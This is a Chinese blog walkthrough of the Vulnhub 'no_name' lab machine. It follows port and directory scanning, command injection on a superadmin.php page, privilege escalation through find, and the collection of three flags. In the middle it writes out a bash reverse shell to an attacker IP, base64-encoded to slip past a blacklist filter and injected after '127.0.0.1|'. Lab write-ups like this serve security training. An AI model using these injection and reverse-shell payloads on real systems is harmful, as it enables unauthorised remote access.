Vulnhub靶机no_name渗透

靶机介绍
官方下载地址:http://www.vulnhub.com/entry/haclabs-no_name,429/
靶机获取shell比较难,提权比较容易,一共有三个flag在用户的家目录里面,需要在virtualbox运行,网络设为桥接
在这里插入图片描述
运行环境
靶机:网络设为桥接,IP地址:192.168.1.91
攻击机:同网段下的kali linux,IP地址:192.168.1.37
开始渗透
运行靶机
在这里插入图片描述
获取靶机IP地址
在这里插入图片描述
扫描端口及其服务
在这里插入图片描述
看到只开放了一个80端口,扫一下目录
在这里插入图片描述
在这里插入图片描述
开始访问得到的目录
80端口的首页,不管输入啥都回显Fake ping wxecuted
在这里插入图片描述
admin是一个宣传页面,
在这里插入图片描述
superadmin.php是一个命令执行的页面
在这里插入图片描述
查看superadmin.php页面的源码,发现有黑名单过滤
在这里插入图片描述
目录分隔符被过滤了可以将反弹shell的命令使用base64加密之后再执行
源代码:bash -i >& /dev/tcp/192.168.1.37/4444 0>&1
加密之后:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMzcvNDQ0NCAwPiYx
kali开启监听之后,执行命令127.0.0.1|echo “YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMzcvNDQ0NCAwPiYx”|base64 -d|bash
在这里插入图片描述
监听成功,查看你所有用户
在这里插入图片描述
有三个用户在yash用户的家目录下找到了flag1.txt
在这里插入图片描述
提示haclabs用户的密码在隐藏文件当中,查看yash用户的所有文件
在这里插入图片描述
查看隐藏文件passwd
在这里插入图片描述
知道haclabs用户的密码,使用su切换到haclabs用户
在这里插入图片描述
在haclabs用户的家目录里面找到了flag2.txt
在这里插入图片描述
使用sudo提权,或者查看usid
在这里插入图片描述
haclabs用户在find的用户组里面
查看find的提权命令
在这里插入图片描述
成功找到flag3.txt
在这里插入图片描述
成功找到所有flag,这个靶机就完成了!

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sword-豪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值